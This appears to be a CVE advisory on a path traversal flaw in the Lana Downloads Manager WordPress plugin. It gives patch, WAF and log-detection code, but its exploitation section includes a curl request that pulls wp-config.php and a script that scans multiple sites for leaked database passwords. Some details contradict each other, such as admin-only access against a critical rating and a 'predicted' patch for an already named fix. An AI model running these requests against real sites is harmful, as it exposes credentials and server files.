How CVE-2025-2048 Works
The Lana Downloads Manager plugin (before v1.10.0) fails to sanitize user-controlled input in file download requests. Admin-level attackers can manipulate the `file` parameter to traverse directories (e.g., `../../wp-config.php`), exposing sensitive server files. The vulnerability stems from insecure `file_get_contents()` usage without path normalization checks, allowing arbitrary file read via crafted HTTP requests like:

```
/wp-admin/admin-ajax.php?action=lana_downloads_manager&file=../../../etc/passwd
```
DailyCVE Form
Platform: WordPress
Version: <1.10.0
Vulnerability: Path Traversal
Severity: Critical
Date: 2025-04-01
Prediction: Patch expected by 2025-07-15
What Undercode Say:
Exploitation
1. Craft malicious request:
```sh
curl -X GET "http://victimsite.com/wp-admin/admin-ajax.php?action=lana_downloads_manager&file=../../wp-config.php" -H "Cookie: admin_session=VALID_SESSION"
```
2. Automated scanning:
```python
import requests

targets = ["site1.com", "site2.com"]
for site in targets:
    r = requests.get(f"https://{site}/wp-admin/admin-ajax.php?action=lana_downloads_manager&file=../../wp-config.php")
    if "DB_PASSWORD" in r.text:
        print(f"Vulnerable: {site}")
```
Protection
1. Immediate mitigation:
```php
// Patch snippet for lana-downloads-manager.php
$allowed_path   = realpath(LANA_DOWNLOADS_PATH);
$requested_file = realpath($allowed_path . DIRECTORY_SEPARATOR . $_GET['file']);
// realpath() returns false for paths that do not exist; comparing against the
// directory plus a trailing separator stops a sibling directory with the same
// prefix (e.g. downloads_backup) from passing the check.
if ($allowed_path === false || $requested_file === false
    || strpos($requested_file, $allowed_path . DIRECTORY_SEPARATOR) !== 0) {
    die("Invalid file path");
}
```
2. WAF rule:
```nginx
location ~ ^/wp-admin/admin-ajax\.php$ {
    # $args is not URL-decoded, so match both the raw and the percent-encoded "../" sequence
    if ($args ~* "file=[^&]*(\.\./|%2e%2e)") { return 403; }
}
```
3. Post-exploit detection:
```sql
SELECT option_name, option_value FROM wp_options WHERE option_name LIKE '%lana_downloads%' AND option_value LIKE '%..%';
```
4. Upgrade command:
```sh
wp plugin update lana-downloads-manager --version=1.10.0
```
5. Intrusion check:
```sh
# escape the dots: an unescaped "../" is a regex that matches any two characters before a slash
grep "lana_downloads_manager" /var/log/apache2/access.log | grep -qiE '\.\./|%2e%2e' && echo "Exploit attempt detected"
```
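The grep one-liner above only catches a literal `../`. As an added example (not part of the original post or the plugin), the script below parses Apache-style access-log lines, isolates requests to the `lana_downloads_manager` action, fully percent-decodes the `file` parameter so single- and double-encoded traversal sequences are caught too, and reports the client IP together with the HTTP status, since a 200 response means the file was actually served. The log lines are constructed samples; no real traffic or site is involved.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample Apache access-log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Apr/2025:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=lana_downloads_manager&file=report.pdf HTTP/1.1" 200 5120
203.0.113.7 - - [01/Apr/2025:10:02:15 +0000] "GET /wp-admin/admin-ajax.php?action=lana_downloads_manager&file=../../wp-config.php HTTP/1.1" 200 2048
203.0.113.9 - - [01/Apr/2025:10:03:40 +0000] "GET /wp-admin/admin-ajax.php?action=lana_downloads_manager&file=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 2048
203.0.113.11 - - [01/Apr/2025:10:04:01 +0000] "GET /wp-admin/admin-ajax.php?action=lana_downloads_manager&file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 300
203.0.113.13 - - [01/Apr/2025:10:05:22 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat&file=../x HTTP/1.1" 200 30
"""

# Common log format: ip ident user [timestamp] "METHOD target PROTO" status size
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\d+|-)')
# A ".." path segment at the start, end, or between slashes of the decoded value.
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are unmasked."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line):
    """Parse one access-log line into its fields, or return None if it does not match."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, _size = m.groups()
    parts = urlsplit(target)
    return {
        "ip": ip,
        "ts": ts,
        "method": method,
        "path": parts.path,
        # parse_qs performs one round of percent-decoding on the values
        "params": parse_qs(parts.query, keep_blank_values=True),
        "status": int(status),
    }


def traversal_payload(entry):
    """Return the decoded `file` value if this request is a traversal attempt
    against the lana_downloads_manager action, otherwise None."""
    if entry is None or not entry["path"].endswith("/wp-admin/admin-ajax.php"):
        return None
    if "lana_downloads_manager" not in entry["params"].get("action", []):
        return None
    for raw in entry["params"].get("file", []):
        # normalise backslashes so "..\" is treated like "../"
        decoded = decode_fully(raw).replace("\\", "/")
        if TRAVERSAL_RE.search(decoded):
            return decoded
    return None


def find_traversal_attempts(log_text):
    """Return (ip, status, decoded_file_value) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        payload = traversal_payload(entry)
        if payload is not None:
            hits.append((entry["ip"], entry["status"], payload))
    return hits


if __name__ == "__main__":
    for ip, status, payload in find_traversal_attempts(SAMPLE_LOG):
        outcome = "served (200)" if status == 200 else f"status {status}"
        print(f"{ip} requested {payload!r}: {outcome}")
```

Run it against a real log with `find_traversal_attempts(open("/var/log/apache2/access.log").read())`; the heartbeat request with a traversal string is deliberately not reported, because the check is scoped to the vulnerable action rather than to any `../` in any URL.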
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode